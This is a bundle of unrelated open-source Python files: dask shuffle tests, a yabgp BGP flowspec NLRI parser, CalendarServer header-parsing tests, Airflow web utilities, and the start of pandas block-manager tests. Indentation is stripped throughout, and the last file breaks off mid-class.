df = pd.DataFrame([{"x": converter(x), "y": x} for x in test_vals])
ddf = dd.from_pandas(df, npartitions=4)
assert ddf.npartitions > 1
ddf = ddf[ddf.y > df.y.max()].set_index("x")
expected_df = df[df.y > df.y.max()].set_index("x")
assert assert_eq(ddf, expected_df)
assert ddf.npartitions == 1
def test_set_index_categorical():
# https://github.com/dask/dask/issues/5671
order = list(reversed(string.ascii_letters))
values = list(string.ascii_letters)
random.shuffle(values)
dtype = pd.api.types.CategoricalDtype(order, ordered=True)
df = pd.DataFrame({"A": pd.Categorical(values, dtype=dtype), "B": 1})
result = dd.from_pandas(df, npartitions=2).set_index("A")
assert len(result) == len(df)
# sorted with the metric defined by the Categorical
divisions = pd.Categorical(result.divisions, dtype=dtype)
assert_categorical_equal(divisions, divisions.sort_values())
def test_compute_divisions():
from dask.dataframe.shuffle import compute_and_set_divisions
df = pd.DataFrame(
{"x": [1, 2, 3, 4], "y": [10, 20, 20, 40], "z": [4, 3, 2, 1]},
index=[1, 3, 10, 20],
)
a = dd.from_pandas(df, 2, sort=False)
assert not a.known_divisions
b = compute_and_set_divisions(copy(a))
assert_eq(a, b, check_divisions=False)
assert b.known_divisions
def test_empty_partitions():
# See https://github.com/dask/dask/issues/2408
df = pd.DataFrame({"a": list(range(10))})
df["b"] = df["a"] % 3
df["c"] = df["b"].astype(str)
ddf = dd.from_pandas(df, npartitions=3)
ddf = ddf.set_index("b")
ddf = ddf.repartition(npartitions=3)
ddf.get_partition(0).compute()
assert_eq(ddf, df.set_index("b"))
ddf = ddf.set_index("c")
assert_eq(ddf, df.set_index("b").set_index("c"))
def test_remove_nans():
tests = [
((1, 1, 2), (1, 1, 2)),
((None, 1, 2), (1, 1, 2)),
((1, None, 2), (1, 2, 2)),
((1, 2, None), (1, 2, 2)),
((1, 2, None, None), (1, 2, 2, 2)),
((None, None, 1, 2), (1, 1, 1, 2)),
((1, None, None, 2), (1, 2, 2, 2)),
((None, 1, None, 2, None, 3, None), (1, 1, 2, 2, 3, 3, 3)),
]
converters = [
(int, np.nan),
(float, np.nan),
(str, np.nan),
(lambda x: pd.to_datetime(x, unit="ns"), np.datetime64("NaT")),
]
for conv, none_val in converters:
for inputs, expected in tests:
params = [none_val if x is None else conv(x) for x in inputs]
expected = [conv(x) for x in expected]
assert remove_nans(params) == expected
@pytest.mark.slow
def test_gh_2730():
large = pd.DataFrame({"KEY": np.arange(0, 50000)})
small = pd.DataFrame({"KEY": np.arange(25, 500)})
dd_left = dd.from_pandas(small, npartitions=3)
dd_right = dd.from_pandas(large, npartitions=257)
with dask.config.set(shuffle="tasks", scheduler="sync"):
dd_merged = dd_left.merge(dd_right, how="inner", on="KEY")
result = dd_merged.compute()
expected = large.merge(small, how="inner", on="KEY")
tm.assert_frame_equal(result.sort_values("KEY").reset_index(drop=True), expected)
@pytest.mark.parametrize("npartitions", [None, "auto"])
def test_set_index_does_not_repeat_work_due_to_optimizations(npartitions):
# Atomic counter
count = itertools.count()
def increment():
next(count)
def make_part(dummy, n):
return pd.DataFrame({"x": np.random.random(n), "y": np.random.random(n)})
nbytes = 1e6
nparts = 50
n = int(nbytes / (nparts * 8))
dsk = {("inc", i): (increment,) for i in range(nparts)}
dsk.update({("x", i): (make_part, ("inc", i), n) for i in range(nparts)})
ddf = dd.DataFrame(dsk, "x", make_part(None, 1), [None] * (nparts + 1))
ddf.set_index("x", npartitions=npartitions)
ntimes = next(count)
assert ntimes == nparts
def test_set_index_errors_with_inplace_kwarg():
df = pd.DataFrame({"a": [9, 8, 7], "b": [6, 5, 4], "c": [3, 2, 1]})
ddf = dd.from_pandas(df, npartitions=1)
ddf.set_index("a")
with pytest.raises(NotImplementedError):
ddf.set_index("a", inplace=True)
def test_set_index_timestamp():
df = pd.DataFrame({"A": pd.date_range("2000", periods=12, tz="US/Central"), "B": 1})
ddf = dd.from_pandas(df, 2)
divisions = (
pd.Timestamp("2000-01-01 00:00:00-0600", tz="US/Central", freq="D"),
pd.Timestamp("2000-01-12 00:00:00-0600", tz="US/Central", freq="D"),
)
# Note: `freq` is lost during round trip
df2 = df.set_index("A")
ddf_new_div = ddf.set_index("A", divisions=divisions)
for (ts1, ts2) in zip(divisions, ddf_new_div.divisions):
assert ts1.value == ts2.value
assert ts1.tz == ts2.tz
assert_eq(df2, ddf_new_div)
assert_eq(df2, ddf.set_index("A"))
@pytest.mark.parametrize("compression", [None, "ZLib"])
def test_disk_shuffle_with_compression_option(compression):
# test if dataframe shuffle works both with and without compression
with dask.config.set({"dataframe.shuffle-compression": compression}):
test_shuffle("disk")
@pytest.mark.parametrize("compression", ["UNKOWN_COMPRESSION_ALGO"])
def test_disk_shuffle_with_unknown_compression(compression):
# test if dask raises an error in case of fault config string
with dask.config.set({"dataframe.shuffle-compression": compression}):
with pytest.raises(
ImportError,
match=(
"Not able to import and load {0} as compression algorithm."
"Please check if the library is installed and supported by Partd.".format(
compression
)
),
):
test_shuffle("disk")
def test_disk_shuffle_check_actual_compression():
# test if the compression switch is really respected by testing the size of the actual partd-data on disk
def generate_raw_partd_file(compression):
# generate and write a dummy dataframe to disk and return the raw data bytes
df1 = pd.DataFrame({"a": list(range(10000))})
df1["b"] = (df1["a"] * 123).astype(str)
with dask.config.set({"dataframe.shuffle-compression": compression}):
p1 = maybe_buffered_partd(buffer=False, tempdir=None)()
p1.append({"x": df1})
# get underlying filename from partd - depending on nested structure of partd object
filename = (
p1.partd.partd.filename("x") if compression else p1.partd.filename("x")
)
return open(filename, "rb").read()
# get compressed and uncompressed raw data
uncompressed_data = generate_raw_partd_file(compression=None)
compressed_data = generate_raw_partd_file(compression="BZ2")
assert len(uncompressed_data) > len(compressed_data)
@pytest.mark.parametrize("ignore_index", [None, True, False])
@pytest.mark.parametrize(
"on", ["id", "name", ["id", "name"], pd.Series(["id", "name"])]
)
@pytest.mark.parametrize("max_branch", [None, 4])
def test_dataframe_shuffle_on_tasks_api(on, ignore_index, max_branch):
# Make sure DataFrame.shuffle API returns the same result
# whether the ``on`` argument is a list of column names,
# or a separate DataFrame with equivalent values...
df_in = dask.datasets.timeseries(
"2000",
"2001",
types={"value": float, "name": str, "id": int},
freq="2H",
partition_freq="1M",
seed=1,
)
if isinstance(on, str):
ext_on = df_in[[on]].copy()
else:
ext_on = df_in[on].copy()
df_out_1 = df_in.shuffle(
on, shuffle="tasks", ignore_index=ignore_index, max_branch=max_branch
)
df_out_2 = df_in.shuffle(ext_on, shuffle="tasks", ignore_index=ignore_index)
assert_eq(df_out_1, df_out_2)
def test_set_index_overlap():
A = pd.DataFrame({"key": [1, 2, 3, 4, 4, 5, 6, 7], "value": list("abcd" * 2)})
a = dd.from_pandas(A, npartitions=2)
a = a.set_index("key", sorted=True)
b = a.repartition(divisions=a.divisions)
assert_eq(a, b)
|
|
# Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""IPv4 Flowspec NLRI
"""
from __future__ import division
from builtins import range
import binascii
import math
import struct
import netaddr
from yabgp.common import constants as bgp_cons
from yabgp.message.attribute.nlri import NLRI
class IPv4FlowSpec(NLRI):
"""ipv4 flow nlri process
"""
@classmethod
def parse(cls, value):
"""
parse IPv4 flowspec NLRI
:param value:
:return:
"""
# +------------------------------+
# | length (0xnn or 0xfn nn) |
# +------------------------------+
# | NLRI value (variable) |
# +------------------------------+
nlri_dict = {}
while value:
offset = 0
flowspec_type = ord(value[0:1])
offset += 1
# decode all kinds of flow spec
if flowspec_type in [bgp_cons.BGPNLRI_FSPEC_DST_PFIX, bgp_cons.BGPNLRI_FSPEC_SRC_PFIX]:
prefix, offset_tmp = cls.parse_prefix(value[offset:])
offset += offset_tmp
nlri_dict[flowspec_type] = prefix
value = value[offset:]
elif flowspec_type in [bgp_cons.BGPNLRI_FSPEC_IP_PROTO, bgp_cons.BGPNLRI_FSPEC_DST_PORT,
bgp_cons.BGPNLRI_FSPEC_SRC_PORT, bgp_cons.BGPNLRI_FSPEC_ICMP_TP,
bgp_cons.BGPNLRI_FSPEC_ICMP_CD, bgp_cons.BGPNLRI_FSPEC_DSCP,
bgp_cons.BGPNLRI_FSPEC_PCK_LEN]:
operator_list, offset = cls.parse_operators(value[offset:])
nlri_dict[flowspec_type] = cls.operator_dict_to_str(operator_list)
value = value[offset:]
else:
operator_list, offset = cls.parse_operators(value[offset:])
nlri_dict[flowspec_type] = cls.operator_dict_to_str(operator_list)
value = value[offset:]
return nlri_dict
@classmethod
def construct(cls, value):
nlri_hex = b''
for nlri in value:
nlri_hex += cls.construct_nlri(nlri)
return nlri_hex
@classmethod
def construct_nlri(cls, data):
""" Construct NLRI """
# there may have many filters in each nlri
data = dict([(int(l), r) for (l, r) in data.items()])
nlri_tmp = b''
for type_tmp in [bgp_cons.BGPNLRI_FSPEC_DST_PFIX, bgp_cons.BGPNLRI_FSPEC_SRC_PFIX]:
if data.get(type_tmp):
nlri_tmp += struct.pack('!B', type_tmp) + cls.construct_prefix(data[type_tmp])
for type_tmp in [bgp_cons.BGPNLRI_FSPEC_IP_PROTO, bgp_cons.BGPNLRI_FSPEC_PORT,
bgp_cons.BGPNLRI_FSPEC_DST_PORT, bgp_cons.BGPNLRI_FSPEC_SRC_PORT,
bgp_cons.BGPNLRI_FSPEC_ICMP_TP, bgp_cons.BGPNLRI_FSPEC_ICMP_CD,
bgp_cons.BGPNLRI_FSPEC_PCK_LEN, bgp_cons.BGPNLRI_FSPEC_DSCP]:
if not data.get(type_tmp):
continue
# translate from expression to binary
nlri_tmp += struct.pack('!B', type_tmp) + cls.construct_operators(data[type_tmp])
if len(nlri_tmp) >= 240:
return struct.pack('!H', len(nlri_tmp)) + nlri_tmp
elif nlri_tmp:
return struct.pack('!B', len(nlri_tmp)) + nlri_tmp
@staticmethod
def parse_prefix(data):
"""
Prefixes are encoded as in BGP UPDATE messages, a length in bits is followed by
enough octets to contain the prefix information.
Encoding: <prefix-length (1 octet), prefix>
"""
prefix_len = ord(data[0:1])
octet_len = int(math.ceil(prefix_len / 8))
tmp = data[1:octet_len + 1]
if isinstance(tmp[0], int):
prefix_data = [i for i in tmp]
else:
prefix_data = [ord(i) for i in tmp]
prefix_data = prefix_data + list(str(0)) * 4
prefix = "%s.%s.%s.%s" % (tuple(prefix_data[0:4])) + '/' + str(prefix_len)
return prefix, octet_len + 1
@classmethod
def construct_prefix(cls, prefix):
"""
construct a prefix string from '1.1.1.0/24' to '\x18\x01\x01\x01'
"""
ip, masklen = prefix.split('/')
ip_hex = netaddr.IPAddress(ip).packed
masklen = int(masklen)
if 16 < masklen <= 24:
ip_hex = ip_hex[0:3]
elif 8 < masklen <= 16:
ip_hex = ip_hex[0:2]
elif 0 < masklen <= 8:
ip_hex = ip_hex[0:1]
elif masklen == 0:
ip_hex = ''
return struct.pack('!B', masklen) + ip_hex
@classmethod
def parse_operators(cls, data):
offset = 0
parse_operator_list = []
while data:
operator = cls.parse_operator_flag(ord(data[0:1]))
# print(operator)
offset += 1
operator_value = int(binascii.b2a_hex(data[1:1 + operator['LEN']]), 16)
offset += operator['LEN']
parse_operator_list.append([operator, operator_value])
# the end of the list
data = data[1 + operator['LEN']:]
if operator['EOL']:
break
return parse_operator_list, offset + 1
@staticmethod
def parse_operator_flag(data):
"""
The operator byte is encoded as:
0 1 2 3 4 5 6 7
+---+---+---+---+---+---+---+---+
|EOL|AND| LEN |RES|LT |GT |EQ |
+---+---+---+---+---+---+---+---+
"""
bit_list = []
for i in range(8):
bit_list.append((data >> i) & 1)
bit_list.reverse()
result = {
'EOL': bit_list[0],
'AND': bit_list[1],
'LEN': 1 << (bit_list[2] * 2 + bit_list[3]),
'LT': bit_list[5],
'GT': bit_list[6],
'EQ': bit_list[7]
}
return result
@staticmethod
def construct_operator_flag(data):
"""construct operator flag from dict to binary
"""
opt_dict = {
'EOL': 0x80,
'AND': 0x40,
'LEN': {
1: 0x00,
2: 0x10,
4: 0x20,
6: 0x30
},
'RES': 0x00,
'LT': 0x04,
'GT': 0x02,
'EQ': 0x01
}
b_data = 0x00
for opt in opt_dict:
if opt in data and opt != 'LEN':
if data[opt] == 1:
b_data += opt_dict[opt]
elif opt == 'LEN' and data[opt]:
b_data += opt_dict['LEN'][data['LEN']]
return b_data
@staticmethod
def operator_dict_to_str(data):
"""
from
[
[
{'AND': 0, 'GT': 0, 'LEN': 1, 'EOL': 0, 'LT': 0, 'EQ': 1},
254
],
[
{'AND': 0, 'GT': 1, 'LEN': 1, 'EOL': 0, 'LT': 0, 'EQ': 1},
254
],
[
{'AND': 1, 'GT': 0, 'LEN': 2, 'EOL': 1, 'LT': 1, 'EQ': 1},
300
]
]
to
=254|>=254&<=300
:param data: dict
:return: string format
"""
return_str = ''
for item in data:
operator_dict, value = item
if operator_dict['AND']:
return_str += '&'
else:
if return_str != '':
return_str += '|'
if operator_dict['GT']:
return_str += '>'
if operator_dict['LT']:
return_str += '<'
if operator_dict['EQ']:
return_str += '='
return_str += str(value)
return return_str
@classmethod
def construct_operators(cls, data):
"""
from "=254|>=254&<=300" to binary data
:param data:
:return:
"""
data_bin = b''
data_list = data.split('|')
eol = 0
for i, data in enumerate(data_list):
if i == len(data_list) - 1:
eol = 1
if '&' not in data:
flag_dict = {'EOL': eol}
if data[0] == '=':
off_set = 1
flag_dict['EQ'] = 1
elif '>=' in data:
off_set = 2
flag_dict['EQ'] = 1
flag_dict['GT'] = 1
elif '<=' in data:
off_set = 2
flag_dict['EQ'] = 1
flag_dict['LT'] = 1
elif '>' in data:
off_set = 1
flag_dict['GT'] = 1
elif '<' in data:
off_set = 1
flag_dict['LT'] = 1
hex_str = hex(int(data[off_set:]))[2:]
if len(hex_str) % 2 == 1:
hex_str = '0' + hex_str
value_hex = bytearray.fromhex(hex_str)
flag_dict['LEN'] = len(value_hex)
opt_flag_bin = cls.construct_operator_flag(flag_dict)
data_bin += struct.pack('!B', opt_flag_bin)
data_bin += value_hex
return data_bin
|
|
##
# Copyright (c) 2005-2015 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from txweb2.http_headers import Headers
from twistedcaldav.config import ConfigDict
from twistedcaldav.stdconfig import _updateClientFixes
from twistedcaldav.util import bestAcceptType, userAgentProductTokens, matchClientFixes
import twistedcaldav.test.util
class AcceptType(twistedcaldav.test.util.TestCase):
"""
L{bestAcceptType} tests
"""
def test_bestAcceptType(self):
data = (
(
"#1.1",
("Accept", "text/plain"),
["text/plain"],
"text/plain",
),
(
"#1.2",
("Accept", "text/plain"),
["text/calendar"],
None,
),
(
"#1.3",
("Accept", "text/*"),
["text/plain"],
"text/plain",
),
(
"#1.4",
("Accept", "*/*"),
["text/plain"],
"text/plain",
),
(
"#2.1",
("Accept", "text/plain"),
["text/plain", "application/text", ],
"text/plain",
),
(
"#2.2",
("Accept", "text/plain"),
["text/calendar", "application/text", ],
None,
),
(
"#2.3",
("Accept", "text/*"),
["text/plain", "application/text", ],
"text/plain",
),
(
"#2.4",
("Accept", "*/*"),
["text/plain", "application/text", ],
"text/plain",
),
(
"#2.5",
("Accept", "application/text"),
["text/plain", "application/text", ],
"application/text",
),
(
"#2.6",
("Accept", "application/*"),
["text/plain", "application/text", ],
"application/text",
),
(
"#3.1",
("Accept", "text/plain;q=0.5, application/text;q=0.3"),
["text/plain", "application/text", ],
"text/plain",
),
(
"#3.2",
("Accept", "text/plain;q=0.5, application/text;q=0.3"),
["text/calendar", "application/calendar", ],
None,
),
(
"#3.3",
("Accept", "text/plain;q=0.5, application/text;q=0.3"),
["text/plain", "application/text", ],
"text/plain",
),
(
"#3.4",
("Accept", "text/plain;q=0.5, application/text;q=0.3"),
["text/plain", "application/text", ],
"text/plain",
),
(
"#3.5",
("Accept", "text/plain;q=0.3, application/text;q=0.5"),
["text/plain", "application/text", ],
"application/text",
),
(
"#3.6",
("Accept", "text/plain;q=0.5, application/*;q=0.3"),
["text/plain", "application/text", ],
"text/plain",
),
(
"#4.1",
("Accept", "text/plain;q=0.5, application/text;q=0.2, text/*;q=0.3"),
["text/calendar", "application/text", ],
"text/calendar",
),
(
"#5.1",
None,
["text/calendar", "application/text", ],
"text/calendar",
),
)
for title, hdr, allowedTypes, result in data:
hdrs = Headers()
if hdr:
hdrs.addRawHeader(*hdr)
check = bestAcceptType(hdrs.getHeader("accept"), allowedTypes)
self.assertEqual(check, result, msg="Failed %s" % (title,))
def test_userAgentProductTokens(self):
"""
Test that L{userAgentProductTokens} correctly parses a User-Agent header.
"""
for hdr, result in (
# Valid syntax
("Client/1.0", ["Client/1.0", ]),
("Client/1.0 FooBar/2", ["Client/1.0", "FooBar/2", ]),
("Client/1.0 (commentary here)", ["Client/1.0", ]),
("Client/1.0 (FooBar/2)", ["Client/1.0", ]),
("Client/1.0 (commentary here) FooBar/2", ["Client/1.0", "FooBar/2", ]),
("Client/1.0 (commentary here) FooBar/2 (more commentary here) ", ["Client/1.0", "FooBar/2", ]),
# Invalid syntax
("Client/1.0 (commentary here FooBar/2", ["Client/1.0", ]),
("Client/1.0 commentary here) FooBar/2", ["Client/1.0", "commentary", "here)", "FooBar/2", ]),
):
self.assertEqual(userAgentProductTokens(hdr), result, msg="Mismatch: {}".format(hdr))
def test_matchClientFixes(self):
"""
Test that L{matchClientFixes} correctly identifies clients with matching fix tokens.
"""
c = ConfigDict()
c.ClientFixes = {
"fix1": [
"Client/1\\.0.*",
"Client/1\\.1(\\..*)?",
"Client/2",
],
"fix2": [
"Other/1\\.0.*",
],
}
_updateClientFixes(c)
_updateClientFixes(c)
# Valid matches
for ua in (
"Client/1.0 FooBar/2",
"Client/1.0.1 FooBar/2",
"Client/1.0.1.1 FooBar/2",
"Client/1.1 FooBar/2",
"Client/1.1.1 FooBar/2",
"Client/2 FooBar/2",
):
self.assertEqual(
matchClientFixes(c, ua),
set(("fix1",)),
msg="Did not match {}".format(ua),
)
# Valid non-matches
for ua in (
"Client/1 FooBar/2",
"Client/1.10 FooBar/2",
"Client/2.0 FooBar/2",
"Client/2.0.1 FooBar/2",
"Client FooBar/2",
"Client/3 FooBar/2",
"Client/3.0 FooBar/2",
"Client/10 FooBar/2",
"Client/10.0 FooBar/2",
"Client/10.0.1 FooBar/2",
"Client/10.0.1 (Client/1.0) FooBar/2",
"Client/10.0.1 (foo Client/1.0 bar) FooBar/2",
):
self.assertEqual(
matchClientFixes(c, ua),
set(),
msg="Incorrectly matched {}".format(ua),
)
|
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import object
from cgi import escape
from io import BytesIO as IO
import functools
import gzip
import dateutil.parser as dateparser
import json
import time
from flask import after_this_request, request, Response
from flask_login import current_user
import wtforms
from wtforms.compat import text_type
from airflow import configuration, models, settings
from airflow.utils.json import AirflowJsonEncoder
AUTHENTICATE = configuration.getboolean('webserver', 'AUTHENTICATE')
DEFAULT_SENSITIVE_VARIABLE_FIELDS = (
'password',
'secret',
'passwd',
'authorization',
'api_key',
'apikey',
'access_token',
)
def should_hide_value_for_key(key_name):
return any(s in key_name.lower() for s in DEFAULT_SENSITIVE_VARIABLE_FIELDS) \
and configuration.getboolean('admin', 'hide_sensitive_variable_fields')
class LoginMixin(object):
def is_accessible(self):
return (
not AUTHENTICATE or (
not current_user.is_anonymous() and
current_user.is_authenticated()
)
)
class SuperUserMixin(object):
def is_accessible(self):
return (
not AUTHENTICATE or
(not current_user.is_anonymous() and current_user.is_superuser())
)
class DataProfilingMixin(object):
def is_accessible(self):
return (
not AUTHENTICATE or
(not current_user.is_anonymous() and current_user.data_profiling())
)
def limit_sql(sql, limit, conn_type):
sql = sql.strip()
sql = sql.rstrip(';')
if sql.lower().startswith("select"):
if conn_type in ['mssql']:
sql = """\
SELECT TOP {limit} * FROM (
{sql}
) qry
""".format(**locals())
elif conn_type in ['oracle']:
sql = """\
SELECT * FROM (
{sql}
) qry
WHERE ROWNUM <= {limit}
""".format(**locals())
else:
sql = """\
SELECT * FROM (
{sql}
) qry
LIMIT {limit}
""".format(**locals())
return sql
def epoch(dttm):
"""Returns an epoch-type date"""
return int(time.mktime(dttm.timetuple())) * 1000,
def action_logging(f):
'''
Decorator to log user actions
'''
@functools.wraps(f)
def wrapper(*args, **kwargs):
session = settings.Session()
if current_user and hasattr(current_user, 'username'):
user = current_user.username
else:
user = 'anonymous'
log = models.Log(
event=f.__name__,
task_instance=None,
owner=user,
extra=str(list(request.args.items())),
task_id=request.args.get('task_id'),
dag_id=request.args.get('dag_id'))
if 'execution_date' in request.args:
log.execution_date = dateparser.parse(
request.args.get('execution_date'))
session.add(log)
session.commit()
return f(*args, **kwargs)
return wrapper
def notify_owner(f):
'''
Decorator to notify owner of actions taken on their DAGs by others
'''
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
if request.args.get('confirmed') == "true":
dag_id = request.args.get('dag_id')
task_id = request.args.get('task_id')
dagbag = models.DagBag(settings.DAGS_FOLDER)
dag = dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
if current_user and hasattr(current_user, 'username'):
user = current_user.username
else:
user = 'anonymous'
if task.owner != user:
subject = (
'Actions taken on DAG {0} by {1}'.format(
dag_id, user))
items = request.args.items()
content = Template('''
action: <i>{{ f.__name__ }}</i><br>
<br>
<b>Parameters</b>:<br>
<table>
{% for k, v in items %}
{% if k != 'origin' %}
<tr>
<td>{{ k }}</td>
<td>{{ v }}</td>
</tr>
{% endif %}
{% endfor %}
</table>
''').render(**locals())
if task.email:
send_email(task.email, subject, content)
"""
return f(*args, **kwargs)
return wrapper
def json_response(obj):
"""
returns a json response from a json serializable python object
"""
return Response(
response=json.dumps(
obj, indent=4, cls=AirflowJsonEncoder),
status=200,
mimetype="application/json")
def gzipped(f):
'''
Decorator to make a view compressed
'''
@functools.wraps(f)
def view_func(*args, **kwargs):
@after_this_request
def zipper(response):
accept_encoding = request.headers.get('Accept-Encoding', '')
if 'gzip' not in accept_encoding.lower():
return response
response.direct_passthrough = False
if (response.status_code < 200 or
response.status_code >= 300 or
'Content-Encoding' in response.headers):
return response
gzip_buffer = IO()
gzip_file = gzip.GzipFile(mode='wb',
fileobj=gzip_buffer)
gzip_file.write(response.data)
gzip_file.close()
response.data = gzip_buffer.getvalue()
response.headers['Content-Encoding'] = 'gzip'
response.headers['Vary'] = 'Accept-Encoding'
response.headers['Content-Length'] = len(response.data)
return response
return f(*args, **kwargs)
return view_func
def make_cache_key(*args, **kwargs):
'''
Used by cache to get a unique key per URL
'''
path = request.path
args = str(hash(frozenset(request.args.items())))
return (path + args).encode('ascii', 'ignore')
class AceEditorWidget(wtforms.widgets.TextArea):
"""
Renders an ACE code editor.
"""
def __call__(self, field, **kwargs):
kwargs.setdefault('id', field.id)
html = '''
<div id="{el_id}" style="height:100px;">{contents}</div>
<textarea
id="{el_id}_ace" name="{form_name}"
style="display:none;visibility:hidden;">
</textarea>
'''.format(
el_id=kwargs.get('id', field.id),
contents=escape(text_type(field._value())),
form_name=field.id,
)
return wtforms.widgets.core.HTMLString(html)
|
|
# -*- coding: utf-8 -*-
# pylint: disable=W0102
from datetime import datetime, date
import operator
import sys
import pytest
import numpy as np
import re
from distutils.version import LooseVersion
import itertools
from pandas import (Index, MultiIndex, DataFrame, DatetimeIndex,
Series, Categorical)
from pandas.compat import OrderedDict, lrange
from pandas.core.sparse.array import SparseArray
from pandas.core.internals import (BlockPlacement, SingleBlockManager,
make_block, BlockManager)
import pandas.core.algorithms as algos
import pandas.util.testing as tm
import pandas as pd
from pandas._libs import lib
from pandas.util.testing import (assert_almost_equal, assert_frame_equal,
randn, assert_series_equal)
from pandas.compat import zip, u
# in 3.6.1 a c-api slicing function changed, see src/compat_helper.h
PY361 = sys.version >= LooseVersion('3.6.1')
@pytest.fixture
def mgr():
return create_mgr(
'a: f8; b: object; c: f8; d: object; e: f8;'
'f: bool; g: i8; h: complex; i: datetime-1; j: datetime-2;'
'k: M8[ns, US/Eastern]; l: M8[ns, CET];')
def assert_block_equal(left, right):
tm.assert_numpy_array_equal(left.values, right.values)
assert left.dtype == right.dtype
assert isinstance(left.mgr_locs, lib.BlockPlacement)
assert isinstance(right.mgr_locs, lib.BlockPlacement)
tm.assert_numpy_array_equal(left.mgr_locs.as_array,
right.mgr_locs.as_array)
def get_numeric_mat(shape):
arr = np.arange(shape[0])
return np.lib.stride_tricks.as_strided(x=arr, shape=shape, strides=(
arr.itemsize, ) + (0, ) * (len(shape) - 1)).copy()
N = 10
def create_block(typestr, placement, item_shape=None, num_offset=0):
"""
Supported typestr:
* float, f8, f4, f2
* int, i8, i4, i2, i1
* uint, u8, u4, u2, u1
* complex, c16, c8
* bool
* object, string, O
* datetime, dt, M8[ns], M8[ns, tz]
* timedelta, td, m8[ns]
* sparse (SparseArray with fill_value=0.0)
* sparse_na (SparseArray with fill_value=np.nan)
* category, category2
"""
placement = BlockPlacement(placement)
num_items = len(placement)
if item_shape is None:
item_shape = (N, )
shape = (num_items, ) + item_shape
mat = get_numeric_mat(shape)
if typestr in ('float', 'f8', 'f4', 'f2', 'int', 'i8', 'i4', 'i2', 'i1',
'uint', 'u8', 'u4', 'u2', 'u1'):
values = mat.astype(typestr) + num_offset
elif typestr in ('complex', 'c16', 'c8'):
values = 1.j * (mat.astype(typestr) + num_offset)
elif typestr in ('object', 'string', 'O'):
values = np.reshape(['A%d' % i for i in mat.ravel() + num_offset],
shape)
elif typestr in ('b', 'bool', ):
values = np.ones(shape, dtype=np.bool_)
elif typestr in ('datetime', 'dt', 'M8[ns]'):
values = (mat * 1e9).astype('M8[ns]')
elif typestr.startswith('M8[ns'):
# datetime with tz
m = re.search(r'M8\[ns,\s*(\w+\/?\w*)\]', typestr)
assert m is not None, "incompatible typestr -> {0}".format(typestr)
tz = m.groups()[0]
assert num_items == 1, "must have only 1 num items for a tz-aware"
values = DatetimeIndex(np.arange(N) * 1e9, tz=tz)
elif typestr in ('timedelta', 'td', 'm8[ns]'):
values = (mat * 1).astype('m8[ns]')
elif typestr in ('category', ):
values = Categorical([1, 1, 2, 2, 3, 3, 3, 3, 4, 4])
elif typestr in ('category2', ):
values = Categorical(['a', 'a', 'a', 'a', 'b', 'b', 'c', 'c', 'c', 'd'
])
elif typestr in ('sparse', 'sparse_na'):
# FIXME: doesn't support num_rows != 10
assert shape[-1] == 10
assert all(s == 1 for s in shape[:-1])
if typestr.endswith('_na'):
fill_value = np.nan
else:
fill_value = 0.0
values = SparseArray([fill_value, fill_value, 1, 2, 3, fill_value,
4, 5, fill_value, 6], fill_value=fill_value)
arr = values.sp_values.view()
arr += (num_offset - 1)
else:
raise ValueError('Unsupported typestr: "%s"' % typestr)
return make_block(values, placement=placement, ndim=len(shape))
def create_single_mgr(typestr, num_rows=None):
if num_rows is None:
num_rows = N
return SingleBlockManager(
create_block(typestr, placement=slice(0, num_rows), item_shape=()),
np.arange(num_rows))
def create_mgr(descr, item_shape=None):
"""
Construct BlockManager from string description.
String description syntax looks similar to np.matrix initializer. It looks
like this::
a,b,c: f8; d,e,f: i8
Rules are rather simple:
* see list of supported datatypes in `create_block` method
* components are semicolon-separated
* each component is `NAME,NAME,NAME: DTYPE_ID`
* whitespace around colons & semicolons are removed
* components with same DTYPE_ID are combined into single block
* to force multiple blocks with same dtype, use '-SUFFIX'::
'a:f8-1; b:f8-2; c:f8-foobar'
"""
if item_shape is None:
item_shape = (N, )
offset = 0
mgr_items = []
block_placements = OrderedDict()
for d in descr.split(';'):
d = d.strip()
if not len(d):
continue
names, blockstr = d.partition(':')[::2]
blockstr = blockstr.strip()
names = names.strip().split(',')
mgr_items.extend(names)
placement = list(np.arange(len(names)) + offset)
try:
block_placements[blockstr].extend(placement)
except KeyError:
block_placements[blockstr] = placement
offset += len(names)
mgr_items = Index(mgr_items)
blocks = []
num_offset = 0
for blockstr, placement in block_placements.items():
typestr = blockstr.split('-')[0]
blocks.append(create_block(typestr,
placement,
item_shape=item_shape,
num_offset=num_offset, ))
num_offset += len(placement)
return BlockManager(sorted(blocks, key=lambda b: b.mgr_locs[0]),
[mgr_items] + [np.arange(n) for n in item_shape])
class TestBlock(object):
def setup_method(self, method):
# self.fblock = get_float_ex() # a,c,e
# self.cblock = get_complex_ex() #
# self.oblock = get_obj_ex()
# self.bool_block = get_bool_ex()
# self.int_block = get_int_ex()
self.fblock = create_block('float', [0, 2, 4])
self.cblock = create_block('complex', [7])
self.oblock = create_block('object', [1, 3])
self.bool_block = create_block('bool', [5])
self.int_block = create_block('int', [6])
def test_constructor(self):
int32block = create_block('i4', [0])
assert int32block.dtype == np.int32
def test_pickle(self):
def _check(blk):
assert_block_equal(tm.round_trip_pickle(blk), blk)
_check(self.fblock)
_check(self.cblock)
